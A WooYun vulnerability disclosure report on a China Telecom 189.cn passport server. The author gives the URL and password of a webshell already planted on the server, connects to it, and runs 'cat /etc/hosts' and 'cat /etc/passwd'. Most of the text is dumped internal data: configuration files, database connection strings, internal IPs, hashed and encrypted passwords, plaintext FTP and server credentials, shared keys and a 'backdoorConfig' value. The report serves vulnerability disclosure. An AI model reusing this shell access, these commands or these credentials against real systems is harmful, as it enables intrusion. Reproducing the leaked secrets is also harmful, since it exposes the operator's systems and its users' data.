当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095538

漏洞标题:中国电信189.cn某站点已getshell

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-02-04 18:52

修复时间:2015-03-21 18:54

公开时间:2015-03-21 18:54

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-21: 细节向公众公开

简要描述:

最少也20rank.

详细说明:

#1
http://hb.passport.189.cn:8080/jbossws13/
有位亲爱的同学留了个shell
上菜刀连之:
password:gainoverqq

15.jpg


#2
getshell

16.jpg


#3
来看看有哪些东西可以利用的

[/home/as/bin/]$ cat /etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#
127.0.0.1 localhost
# special IPv6 addresses
::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts
192.168.103.19 udbas1b.site udbas1b
192.168.103.17 udbas1a
119.103.248.32 hb.passport.189.cn
192.168.1.4 udbas1b.site udbas1b
192.168.1.5 udbas1b.site udbas1b
58.53.194.22 spinterface.hb.vnet.cn


[/home/as/bin/]$ cat /etc/passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:106:110:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:106:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:103:105:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:104:107:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:105:109:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
udb:x:1000:100:udb:/home/udb:/bin/bash
ftpsecure:x:107:65534:Secure FTP User:/var/lib/empty:/bin/false
as:x:600:1008::/home/as:/usr/bin/csh
patrol:x:1001:1009::/home/bmc:/bin/sh
udbnetm:x:1002:1008::/home/udbtonetm:/usr/bin/csh
szz:x:1003:1010::/:/bin/bash
unionmon:x:1004:100::/home/unionmon:/bin/bash


配置文件
bme.protocol.properties

##SMTP##
#SMTP address of the mail server
mail.host=smtp.126.com
#SMTP port number that must be an integer. The default port number is 25.
mail.port=25
#Local address (host name) to bind to when creating the SMTP socket. Defaults to
#the address picked by the Socket class. Should not normally need to be set, but
#useful with multi-homed hosts where it's important to pick a particular local address to bind to.
#mail.smtp.localaddress=
#Local port number to bind to when creating the SMTP socket.
#Defaults to the port number picked by the Socket class.
#mail.smtp.localport=
#Socket connection timeout value in milliseconds. Default is infinite timeout.
#mail.smtp.connectiontimeout=
#Socket I/O timeout value in milliseconds. Default is infinite timeout.
#mail.smtp.timeout=
#The initial debug mode. Default is false.
#mail.debug=false
#Mail address of the SMTP user
mail.from=hblhzx@126.com
#User name of the SMTP server
mail.username=hblhzx@126.com
#Password of the SMTP user, password will be encrypted, please see system management developer guide
mail.password=j/GJNSzxGFPnHHjwozUZ1A==
#If true, attempt to authenticate the user using the AUTH command. Defaults to false.
mail.smtp.auth=true
##SMS##
#SenderSms implement. You can also implement the interface manually.
#If input is null, the system will load default SMPP33 implement.
sms.provider=SMGP30
#Short message work dir, default value is under the CLASSPATH
sms.workdir=/home/as/server/default/deploy/BME.war/device
#The directory where the isap log stored, default value is under the workdir
sms.log.dir=./logs
#short message device name, default is smpp3301. This value is configured in smpp3301-device.xml
#Default value is null
sms.device.name=smgp3001
##LDAP Adapter##
#IP address of LDAP,the value is not null
adapter.ip=127.0.0.1
#The port of ldap,default is 1389
adapter.port=1389
#client max connection
adapter.maxConnection=128
adapter.rootDN=dc=bme\,dc=huawei\,dc=com
#simple Authentication
adapter.userName=cn=Manager
#Use of strong authentication encouraged.
adapter.password=5F4DCC3B5AA765D61D8327DEB882CF99
#thread.corePoolSize=5
#thread.maxPoolSize=128
#thread.keepAliveTime=10
#thread.queueCapacity=512


jdbc.properties

#-----------------------------parameter description--------------------------
# driver The driver can be configured "oracle.jdbc.driver.OracleDriver",
# "com.informix.jdbc.IfxDriver", or "com.ibm.db2.jcc.DB2Driver".
#
# url The url ocan be configured "jdbc:oracle:thin:@IP:PORT:SID",
# "jdbc:db2://IP:PORT/databaseName",or "jdbc:informix"
# "-sqli://IP:PORT/databaseName:INFORMIXSERVER=ifx_server_name",
# it must be keep the same with driver.
#
# dbtype The dbtype can be configured "oracle","db2",or "informix",
# it must be keep the same with driver.
#
# testsql The testsql can be configured "select count(*) from dual" for
# oracle, "select * from sysusers" for informix, or
# "select * from sysibm.sysdummy1" for DB2.
#
# password The password must be encrypted by das tool.
#----------------------------------------------------------------------------
bme.driver=oracle.jdbc.driver.OracleDriver
bme.url=jdbc:oracle:thin:@192.168.103.8:1521:udbdb
bme.username=udb
bme.password=QuBASIXOLQeKaSOS63qKrA==
bme.testsql=select count(*) from dual
bme.active = 8
bme.minidle = 8
bme.maxidle = 8
bme.maxwait = -1
bme.checkAfterUsed=true
bme.clientCharset = GBK
#bme.dbCharset = ISO-8859-1
om.driver=oracle.jdbc.driver.OracleDriver
om.url=jdbc:oracle:thin:@192.168.103.8:1521:udbdb
om.username=udb
om.password=QuBASIXOLQeKaSOS63qKrA==
om.testsql=select count(*) from dual
om.active = 8
om.minidle = 8
om.maxidle = 8
om.maxwait = -1
om.checkAfterUsed=true
#bmeXa.driver=oracle.jdbc.driver.OracleDriver
#bmeXa.url=jdbc:oracle:thin:@IP:PORT:SID
#bmeXa.username=username
#bmeXa.password=22221169131C234D0A1B05590AF320CA
#bmeXa.dbtype=oracle
#bmeXa.level=0
#bmeXa.testsql=select count(*) from dual
#bmeXa.checkAfterUsed=true
dtProxy.selfID=602
dtProxy.url1=10.164.124.110:110
dtProxy.url2=10.164.124.111:111
bossProxy.primaryAddress=IP:PORT
bossProxy.failoverAddress=IP:PORT
#bossProxy.userName=
#bossProxy.userPassword=
#tuxedo.primaryAddress=//IP:PORT
#tuxedo.failoverAddress=//IP:PORT
#tuxedo.minPoolSize=2
#tuxedo.maxPoolSize=2
#tuxedo.recvTimeout=10
#tuxedo.userName=
#tuxedo.userPassword=
#tuxedo.userRole=
#tuxedo.appPassword=


configinfo_cache.txt

1800000000100001.CRMInterfaceSoap|http://119.103.248.32:8080/BME/services/CRMInterfaceSoap12?wsdl|1800000000100001.CRMInterfaceSoap|CRM的配置信息|0001|2011-03-04 09:36:17|2012-04-18 15:35:04
1800000000100101.NETURL|http://hb.ct10000.com/|1800000000100101.NETURL|网厅地址|0001|null|2012-06-04 10:11:14
1800000000100501.SSOFROMUDBURL|http://uam.hb.ct10000.com:8080/SSOFromUDB|1800000000100501.SSOFROMUDBURL|UAM提供给UDB专用的单点登录接口地址|0001|null|2011-11-23 15:45:03
1800000000100501.UaUDBServerImplPort|http://uam.hb.ct10000.com:8080/services/ServiceForUDB?wsdl|1800000000100501.UaUDBServerImplPort|在|0001|2011-03-03 18:29:25|2011-11-21 15:26:01
1800000000200101.UDBCommonSoap|http://119.103.248.32:8080/BME/services/UDBCommonSoap12?wsdl|1800000000200101.UDBCommonSoap|互联星空接口|0001|2011-08-30 15:50:56|2011-10-18 11:26:02
1800000000200201.UDBForBNETSoap|http://119.103.248.32:8080/BME/services/UDBForBNETSoap12?wsdl|1800000000200201.UDBForBNETSoap|和领航平台接口|0001|2011-05-09 09:40:12|2011-10-14 10:06:11
1800000000300101.BandWidthAAASoap|http://133.2.32.58:10024/services/BandWidthAAASoap?wsdl|1800000000300101.BandWidthAAASoap|AAA提供的接口地址|0001|2011-10-12 11:39:00|2012-05-22 15:55:00
1800000000402701.UDBCommonSoap|http://133.0.150.76:8081/serviceToUDB/services/UDBSSSoap?wsdl|1800000000402701.UDBCommonSoap|彩铃提供给UDB的接口地址|0001|2013-06-17 09:22:54|2014-03-03 13:05:13
1800000000402801.UDBCommonSoap|http://133.0.150.76:8083/serviceToUDB/services/UDBSSSoap?wsdl|1800000000402801.UDBCommonSoap|彩振提供UDB的接口|0001|2013-07-01 10:01:29|2014-03-03 13:05:21
3500000000000001.ProvinceNationalSoap|http://10.235.198.60:8810/ProvinceNational/ProvinceNational.asmx|3500000000000001.ProvinceNationalSoap|省UDB与全国交互的接口|0001|2011-02-26 10:49:32|2011-10-13 01:26:53
3500000000000001.UDBCommonSoap|http://10.235.198.60:8810/UDBCommon/UDBCommon.asmx|3500000000000001.UDBCommonSoap|公共接口|0001|2011-02-26 10:47:02|2011-10-13 01:26:37
AAAVersion|1|AAA认证接口版本|AAA认证接口版本,0代表3.0版本,1代表3.1版本|0007|null|2011-10-27 10:34:03
BAND_AUTH_ EFFECT_TIME|2|宽带验证码有效期|默认为2小时,配置为空表示长期有效,记录的失效时间为9999-12-31 23:59:59|0006|null|null
BIND_Email_MAXNum|6|Email绑定数|设置领航平台Email默认绑定最大数|0004|null|2011-06-23 13:57:32
BIND_MOBILE_MaxNum|2|异网手机绑定数|设置领航平台异网手机默认绑定最大数|0004|null|null
BIND_USERID_MAXNum|2|统一账号绑定数|设置领航平台统一账号默认绑最大数|0004|null|null
BNET_PWD_EffectiveTime|0|领航平台密码有效期(天)|领航平台密码有效期,0代表长期有效|0004|null|null
BNET_USERID_RESERVE_TIME|10|注销用户数据保留天数|配置注销用户数据保留时间,单位天|0006|2011-04-08 10:45:22|2011-04-08 10:45:22
BROAD_BAND_VALIDATE|0|调用宽带验证接口标识|0:直接返回成功、1:VNET接口,2:Radius接口|0007|null|null
CONSTANT_PASSWORD|999999|固定密码|3A固定密码|0003|null|null
DELAY_TIME|1|定期更新密钥时间|定期更新密钥时间(单位:小时),默认1小时|0007|null|null
DELETE_CANCEL_STATUS_TIME|3|删除拆机状态记录时间|删除拆机状态记录时间(单位:月),默认3个月|0007|null|null
DIVIDE_SIGN|#|批量开户的字符串分割符|批量开户的字符串分割符|0006|null|null
EXT_PASSD_EFFECT_TIME|90|扩展密码有效期|扩展密码有效期(单位:天),默认90天|0003|null|null
HISTORY_RECORD_CLEAR|1,1,00:00:00,00:00:00|定时删除历史记录|定时删除认证历史记录定时配置|0007|null|null
INPUT_PASSWORD_SWITCH|off|UAM多账号密码选择开关|多账号登录密码选择开关,on需要密码,off不需要密码|0002|null|null
IsAgainNotify|off|失败消息重发开关|失败消息重发开关,on为打开,off为关闭,默认off|0002|null|2012-05-09 10:21:27
LocalKpiFilePath|/home/as/kpifile|存放kpi文件的本地路径|存放kpi文件的本地路径,以"/"开头为绝对路径,非"/"开头为相对对路径|0007|null|2014-05-07 14:10:07
MobileSyncFailTime|3|手机账号同步自动重发最大失败次数|手机账号同步自动重发最大失败次数(1-20,默认为5)|0007|2013-07-30 23:16:19|2013-07-30 23:16:19
NATIONAL_CT10000|http://www.ct10000.com|全国网厅链接|全国提供的网厅链接|0001|null|null
NORMAL_PASSWORD_ENCRY_TYPE|1|通用密码加密方法|1:3DES 9:明文传送|0003|null|null
PASSWORD_EFFECT_TIME|99999|通用密码有效期|通用密码有效期(单位:天),默认90天|0003|null|2012-01-09 13:37:25
PASSWORD_FORMAT|2,[6-16]|通用密码格式|1:1-6位数字;2:6-16位数字或字符;3:不控制|0003|null|null
PRIVILEGE.SWITCH|off|AS页面权限控制开关|AS页面权限控制开关,on打开,off关闭|0002|null|null
PWD_VALIDATE_LEVEL|1|密码验证安全级别|0:不控制;1:控制|0003|null|null
PWD_VALIDATE_TYPE|3|验证密码类型|1:IT/通用密码;2:IT密码;3:通用密码;4:通用密码,需要同步到全国|0003|null|null
PrimaryClusterIPs|null|统计kpi数据服务器的IP和端口|双机环境不需要配置,集群环境需要配置所有服务器的IP和端口(包括本机),以","隔开,如:IP1:PORT,IP2:PORT|0007|null|null
RequestTime_Validate|2|WebServices接口超时限制|WebServices接口超时限制(单位:秒),默认2秒|0006|null|null
SS_STAT_TIME|1,2,00:00:00,00:00:00|SS_STAT_TIME|统计认证情况上传全国定时配置|0007|null|null
SYNC_DATAFAILURECLEAR_TIME|60|消息同步失败记录数据保留天数|配置同步消息失败记录保留天数(单位:天),默认60天|0006|null|2011-09-14 04:48:42
ServiceCode|CAP02002|接口协议编码|接口协议编码|0007|null|null
SupportNewAccountLogin|0|IP白名单接口控制|IP白名单接口控制开关,0:走AccountLogin接口流程,1:走NewAccountLogin接口流程,2:新旧接口都能正常使用|0002|2014-04-23 23:54:37|2014-04-23 23:54:37
SwitchWebPage|on|全国页面开关(集团2.5规范)|控制是否跳转到全国页面的开关(集团2.5规范)|0002|2013-07-30 11:07:19|null
SyncInfoToNudbSwitch|on|发送查询或用户同步请求到全国UDB开关(2.5规范)|发送查询或用户同步请求到全国UDB开关(2.5规范),on为打开,off为关闭,默认off|0002|null|null
TICKET_TIME|60|ticket有效期|ticket有效期(单位:秒),默认2秒|0006|null|null
TMP_EFFECT_TIME|60|动态密码有效期|动态密码有效期(单位:秒),默认60秒|0003|null|null
TMP_PROPERTY|0|动态密码属性|0一定时间有效;1一次性有效|0003|null|null
TRANSMIT_PW_STATUS_OFF|off|漫游认证密码策略开关|漫游认证密码策略开关,on表示需要进行业务密码策略认证,off表示不需要|0002|null|null
UDB.CANCELACCOUNT.NOTIFY.SS|on|销户通知应用系统开关|on时,省UDB销户之前是通知已注册应用系统,off时,不通知|0002|null|2011-10-26 11:05:30
UDB.DEL.FAILRECORDER|3|按天数删除同步失败表|删除3天前的同步失败表中的记录,默认值3天|0007|null|null
UDB.GENERATION.VIRTUALACCOUNT.SWITCH|on|对裸宽带生成虚拟帐号开关|对裸宽带生成虚拟帐号开关|0002|null|null
UDB.MONITOR.PERIOD|5|监控周期|一个监控周期对外部网元作一次连接检测,缺省值5分钟|0007|null|null
UDB.MONITOR.TIMEOUT|5000|监控连接超时时间|连接外部网元时连接超时时间,缺省值5000毫秒|0007|null|null
UDB.RECORDS.MAX|500|读取失败重发记录最大数目|读取失败重发记录最大数目,缺省值500|0007|null|null
UDB.USERID.ADDAREACODE.SWITCH|off|验证固话、PHS增加区号开关|是否为不带区号的固话、PHS增加区号|0002|null|2011-10-12 15:57:37
UDB.USERID.CHANGESTATUS.SWITCH|off|CRM同步的状态是否转换|CRM同步的状态是否转换|0002|null|2012-01-10 16:07:16
UDB.UserSyncErrorToCenter.batchOperNum|5000|UDB.UserSyncErrorToCenter.batchOperNum|定时任务重发时一次捞取的条数|0006|2013-07-30 11:07:19|null
UDB.VERIFY.VIRTUALACCOUNT.SWITCH|off|验证裸宽带生成虚拟账号开关|是否验证裸宽带所生成的虚拟账号|0002|null|null
UDB.WARNLOG.PERIOD|60|告警周期|在告警周期内告警数达到一半以上,记录告警日志,缺省值60分钟|0007|null|null
UDB_SHAR_KEY_IV|12345678|偏移向量|UDB内部偏移向量|0006|null|null
UDB_SHAR_PWD_KEY|AAAAA111BBBBB111CCCCC111DDDDD111EEEEE111FFFFF111|UDB内部密钥|UDB内部密钥|0006|null|null
UPDATE_KEY_TIME|10|延长时间|更新密钥延长时间(单位:秒),默认10秒|0007|null|null
USER_COUNT_STAT_TIME|1,2,00:00:00,00:00:00|USER_COUNT_STAT_TIME|用户发展统计信息上传全国定时配置|0007|null|null
UnlockTime|1|领航用户自动解锁时间(分)|领航用户自动解锁时间|0004|null|2011-08-30 15:39:02
UserinfoSyncSaveTime|30|中间表数据保留天数|中间表数据保留天数,默认30天|0007|null|null
Version|CAP0200220090904|操作结果编码|操作结果编码|0007|null|null
aaa.interface_version|1.0/1.2|AAA接口版本号|AAA接口版本号|0008|null|null
aaa.ip|null|AAA IP地址|AAA IP地址|0008|null|null
aaa.port|null|AAA端口号|AAA端口号|0008|null|null
aaa.ss_device_name|null|AAA系统名称|AAA系统名称|0008|null|null
aaa.ss_device_no|null|AAA系统编号|AAA系统编号|0008|null|null
accountRegister|http://passport.189.cn/Services/AccountRegister.aspx|全国中心为省UDB提供的统一帐号注册页面请求地址|全国中心为省UDB提供的统一帐号注册页面请求地址|0001|2013-07-30 11:07:19|null
app.deviceNo|null|应用系统编号|相连应用系统编号,多个以“,”分割|0008|null|null
app.treaty|1.0/1.2|接口协议版本|接口协议版本|0008|null|null
app.udbIP|null|UDB提供给应用系统的IP地址|UDB提供给应用系统连接用的IP地址|0008|null|null
app.udbPort|null|UDB提供给应用系统的端口号|UDB提供给应用系统连接用的端口号|0008|null|null
backdoorConfig|HuaweiMDSP20110606|应急控制项|HuaweiMDSP+日期|0007|null|2014-04-23 11:04:37
bnet.mailActiveHttp|http://119.103.248.32:8080/|邮箱激活链接|领航账户绑定邮箱激活链接|0004|null|2012-06-06 15:57:36
bnet.mailUsefullife|24|邮件激活链接有效期限(小时)|邮件激活链接有效期限,以小时为单位|0004|null|null
bnet.mobileUsefullife|60|异网手机验证码有效期限(秒)|异网手机验证码有效期限,设置为0代表由领航平台维护有效期|0004|null|null
bnet.ss_device_no|1800000000200201|省领航平台设备标识|省领航平台设备标识|0006|null|2011-09-07 10:22:39
chargeTermID|null|计费用户号码|计费用户号码|0005|null|2013-05-15 22:05:03
crm.interface_version|1.0/1.2|CRM接口版本号|CRM接口版本号|0008|null|null
crm.ip|null|CRM IP地址|CRM IP地址|0008|null|null
crm.ss_device_name|null|CRM系统名称|CRM系统名称|0008|null|null
crm.ss_device_no|null|CRM系统编号|CRM系统编号|0008|null|null
crmSyncTableSwitch|on|CRM同步中间表开关|CRM同步中间表开关,默认off|0002|null|null
crm_udb_conn_url|jdbc:oracle:thin:@192.168.103.8:1521:udbdb+udb+udb|CRM数据库连接URL|CRM数据库连接配置格式:jdbc:oracle:thin:@10.40.33.47:1521:MDSP+udbcrm+udbcrm|0006|null|2012-02-24 18:57:06
deleteWErrorLogTableSwitch|off|清除UAM数据同步错误信息表开关|清除UAM数据同步错误信息表开关,默认off|0002|null|null
expStatIp|192.168.103.19|导出接口统计文件存放服务器IP地址|导出文件存放服务器IP地址,默认为10.40.200.23|0006|null|2014-05-12 10:59:31
expStatServerpassword|udbnetm|导出接口统计文件存放服务器密码|导出接口统计文件存放服务器密码,默认为:udbrpt|0006|null|2014-05-12 11:00:12
expStatServeruser|udbnetm|导出接口统计文件存放服务器用户名|导出接口统计文件存放服务器用户名,默认为:udbrpt|0006|null|2014-05-12 11:00:29
expStatpwd|/home/udbtonetm/kpi|导出接口文件存放路径|导出接口文件存放路径,默认为:/home/udbrpt/kpi|0006|null|2014-05-12 11:01:32
isSuportActiveFlag|on|支持2.5规范的ActiveFlag取值开关(2.5规范)|支持2.5规范的ActiveFlag取值开关(2.5规范),on为打开,off为关闭,默认off|0002|null|null
isUpdateStatusList|off|是否更新业务信息|全部更新场景是否更新业务信息|0002|null|null
isWriteInterfaceLog|off|是否需要写接口日志开关|是否需要写接口日志开关,默认为off|0002|2013-07-30 11:07:18|null
isag.interface_version|1.0/1.2|ISAG接口版本号|ISAG接口版本号|0008|null|null
isag.ip|null|ISAG IP地址|ISAG IP地址|0008|null|null
isag.port|null|ISAG端口号|ISAG端口号|0008|null|null
isag.ss_device_name|null|ISAG系统名称|ISAG系统名称|0008|null|null
isag.ss_device_no|null|ISAG系统编号|ISAG系统编号|0008|null|null
ismp.interface_version|1.0/1.2|ISMP接口版本号|ISMP接口版本号|0008|null|null
ismp.ip|null|ISMP IP地址|ISMP IP地址|0008|null|null
ismp.port|null|ISMP 端口号|ISMP 端口号|0008|null|null
ismp.ss_device_name|null|ISMP系统名称|ISMP系统名称|0008|null|null
ismp.ss_device_no|null|ISMP系统编号|ISMP系统编号|0008|null|null
licenseControlSwitch|off|license控制开关|on表示开启,off表示关闭|0002|null|2011-10-31 13:53:56
local.alarm.file.path|/home/as/alarmfile/|存放告警文件的本地路径|存放告警文件的本地路径|0007|null|2014-05-07 14:27:32
localFilePath|/home/as/localWebKpiFile/|webkpi本地路径|webkpi生成的TXT文件本地路径|0007|null|2014-05-07 14:21:26
monthly.collection.trigger|1|按月统计的kpi数据的采集时间|范围:(1~28),如:配置成1 表示每个月1号采集按月统计的kpi数据|0007|null|null
multiUserSwitch|off|江苏多账号登陆开关|江苏多账号登陆开关,开关关闭则弹出多账号选择页面,开关打开不弹出选择页面,默认:off|0002|null|2012-03-20 10:24:20
nation.link.province.udbip|10.233.180.22|相连省UDB平台侧的IP地址|相连省UDB平台侧的IP地址|0008|null|2014-05-07 14:36:28
nation.link.province.udbport|8080|相连省UDB平台侧的端口号|相连省UDB平台侧的端口号|0008|null|2014-05-07 14:37:03
nation.ss_device_no|3500000000000001|全国设备号|全国设备号|0006|null|null
nation.udb.ForgetPWDSetup.url|http://passport.189.cn/Services/ForgetPWDSetup.aspx|全国中心为省UDB提供的标准统一的忘记密码设置页面服务|全国中心为省UDB提供的标准统一的忘记密码设置页面服务|0001|2013-07-30 11:07:19|null
nation.udb.InitPWDSetup.url|http://passport.189.cn/Services/InitPWDSetup.aspx|全国中心为省UDB提供的标准统一的初始密码设置页面服务|全国中心为省UDB提供的标准统一的初始密码设置页面服务|0001|2013-07-30 11:07:19|null
nationudb.interface.version|1.0/1.2|集团UDB接口版本号|集团UDB接口版本号|0008|null|null
nationudb.ip|10.235.198.60|集团UDB平台侧的IP地址|集团UDB平台侧的IP地址|0008|null|2014-05-07 14:38:07
nationudb.port|8810|集团UDB平台侧的端口号|集团UDB平台侧的端口号|0008|null|2014-05-07 14:38:39
nationudb.ss_device_no|3500000000000001|集团设备号|集团设备号|0008|null|null
needPrintAccountInfoRefreshClient|on|是否打印帐号信息更新客户端接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:12
needPrintAccountInfoRefreshService|on|是否打印帐号信息更新服务端接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:24
needPrintAccountLogin|on|是否打印业务认证请求接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:21
needPrintIPTVPassportCheck|off|是否打印IPTV重定向令牌验证接口统计日志|off为关,on为开|0002|null|null
needPrintIPTVPassportLogin|off|是否打印IPTV重定向认证请求接口统计日志|off为关,on为开|0002|null|null
needPrintPassportCheck|on|是否打印重定向令牌验证接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:07
needPrintPassportLogin|on|是否打印重定向认证请求接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:11
needPrintSSOFromUAM|on|是否打印UAM单点登录接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:56
needPrintSSOFromUDB|on|是否打印UDB单点登录接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:50
needPrintUserIDCancelNotify|on|是否打印用户帐号销户通知接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:38
needPrintUserInfoSync|on|是否打印用户帐号信息同步接口统计日志|off为关,on为开|0002|null|2014-05-05 16:13:22
needPrintWapLogin|on|是否打印Wap重定向认证请求接口统计日志|off为关,on为开|0002|null|2013-07-03 15:28:41
netManager.Cycle|15|采集时间周期|采集时间周期,该值需要与定时任务值相同。定时任务采用毫秒,该值使用分钟|0007|null|null
netManager.defaultPMServiceURL|http://192.168.103.30:18082/pmServicePro_udb/services/PmService?wsdl |网管PMService接口|网管PMService接口|0007|null|2014-05-23 09:37:32
netMgrHostname|192.168.103.30|网管 ftp 服务器地址|网管 ftp 服务器地址|0007|null|2014-05-19 09:10:56
netMgrKpiFileDirectory|/opt/UDB|存放kpi文件的网管 ftp服务器的文件路径|存放kpi文件的网管 ftp服务器的文件路径|0007|null|2014-05-07 15:55:03
netMgrPort|21|网管 ftp 服务器端口号|网管 ftp 服务器端口号,默认为:21|0007|null|2014-05-07 14:09:12
netMgrPwd|udbtaiyue|网管 ftp 登录密码|网管 ftp 登录密码|0007|null|2014-05-07 14:06:45
netMgrUsername|udbtaiyue|网管 ftp 登录名|网管 ftp 登录名|0007|null|2014-05-07 14:06:51
netmgr.alarm.file.path|/home/udbtonetm/doWebBusinessAlarm/|上报网管告警文件存放FTP服务器的路径|上报网管告警文件存放FTP服务器的路径|null|2013-07-30 11:07:18|2014-05-09 10:37:19
netmgr.fmservice.url|http://192.168.103.30:18081/fmwebservice_udb/services/FMService?wsdl|网管告警接口WSDL地址|网管告警接口WSDL地址|null|2013-07-30 11:07:18|2014-05-19 09:13:01
overdueTime|3|配置KPI文件、回执文件过期多久可以删除|配置UDB ftp服务器上的KPI文件和回执文件过期多久可以删除,以月为单位|0007|null|null
smgp_atTime|2011-02-25 13:20:15|短消息定时发送时间|短消息定时发送时间|0005|null|null
smgp_feeCode|00|资费代码|资费代码|0005|null|null
smgp_feeType|00|收费类型|收费类型|0005|null|null
smgp_fixedFee|00|包月费/封顶费|包月费/封顶费|0005|null|null
smgp_msgFormat|15|短消息格式|短消息格式|0005|null|2013-05-15 23:38:37
smgp_msgType|6|短消息类型|短消息类型|0005|null|null
smgp_needReport|0|SP是否要求返回状态报告|SP是否要求返回状态报告|0005|null|null
smgp_priority|2|短消息优先级|短消息优先级|0005|null|null
smgp_serviceID|10659229|业务代码|业务代码|0005|null|2013-05-15 15:56:35
smgp_validTime|5|短消息有效时间|短消息有效时间(单位:分钟),默认1分钟|0005|null|2013-05-16 09:36:51
sms_captcha|@USERID 您好,您的验证码是: @PWD|验证码下发内容|验证码短下发短消息描述|0005|null|2013-05-21 20:29:39
sms_description|@PWD|通用密码下发内容|短消息描述|0005|null|2013-05-16 09:40:41
sms_pwd_description|@PWD|sms_pwd_description|短信动态密码下发|0005|null|2013-05-16 09:40:20
sms_third_pwd_desc|@PWD|sms_third_pwd_desc|第三方密码|0005|null|2013-05-16 09:40:09
smscode_description|尊敬的@MOBILENUMBER手机用户,您的验证码已经生成成功,验证码为@AUTHCODE,您可以通过该验证码进行绑定异网手机|异网手机下发验证码内容|验证码信息描述|0004|null|null
srcTermID|10659229|短消息发送方号码|短信发送方号码|0005|null|2012-12-03 10:55:22
syncAllDataSwitch|off|全量对比开关|全量对比开关,默认off|0002|null|null
terminal_deviceNo|null|天翼客户端设备号|天翼客户端设备号|0006|null|null
uamSyncTableSwitch|off|UAM同步中间表开关|UAM同步中间表开关,默认off|0002|null|null
uam_control_user_name|uauth|全量/增量数据比对UAM控制表对应的用户名|全量/增量数据比对UAM控制表对应的用户名|0007|2013-07-30 11:07:26|null
uam_dstSysID|000|认证方式类型|dstSysID|0007|null|null
uam_pwEncryType|9|uam传输的密码加密类型|uam传输的密码加密类型,9为明文,1为3DES加密|0003|null|2012-05-18 10:21:27
uam_requestcer|//WEB-INF//classes//ua//uam.cer|uam.cer文件路径|requestcer|0001|null|null
uam_requestxsd|//WEB-INF//classes//uamRequest.xsd|uamRequest.xsd文件路径|requestxsd|0001|null|null
uam_root_11013|//WEB-INF//classes//11013//|udbkeystore文件路径|uam_root_11013|0001|null|null
uam_root_11013_pwd|//WEB-INF//classes//11013//pwd.properties|pwd.properties文件路径|uam_root_11013_pwd|0001|null|null
uam_srcSysID|999|省份标识编码|srcSysID|0007|null|null
uam_transactionID|999|业务平台编码|transactionID|0007|null|null
uam_udb_conn_url|jdbc:oracle:thin:@10.41.16.224:1521:MDSP+udbc03+udbc03|UAM数据库连接URL|UAM数据库连接配置格式:jdbc:oracle:thin:@IP:1521:MDSP+用户名+密码|0007|null|null
uam_udb_fetch_count|5000|从UAM数据库每次抽取数据数量|从UAM数据库每次抽取数据数量,默认5000|0007|null|null
udb.AAAIP|127.0.0.1|宽带验证接口调用AAA时IP|宽带验证接口调用AAA时IP|0006|null|null
udb.AAA_key|huawei|Radius_share_key AAA约定共享密钥|Radius_share_key AAA约定共享密钥|0007|null|null
udb.ContactPerson|null|集成商联系人|集成商联系人|0008|null|null
udb.ISAP_edition_switch|on|宽带密码是否明文|对于宽带认证, on 时,PAP的用户密码是明文,off 时,PAP密码是密文的|0002|null|null
udb.Integrator|null|集成商|集成商|0008|null|null
udb.PwdType|0|获取动态密码类型|获取动态密码类型:0表示随机密码,1表示通用密码,2业务密码,默认0|0003|null|null
udb.UAMDeviceNo|1800000000100501|省UAM设备号|省UAM设备号|0006|null|null
udb.abilityOfAuth|null|UDB设计并发认证处理能力|UDB设计并发认证处理能力,次/秒|0008|null|null
udb.accountLogin.switch|off|是否验证存在绑定关系|on需要验证绑定关系,off有绑定需要验证没有就不验证|0002|null|null
udb.address|null|机房信息|系统所在机房位置|0008|null|null
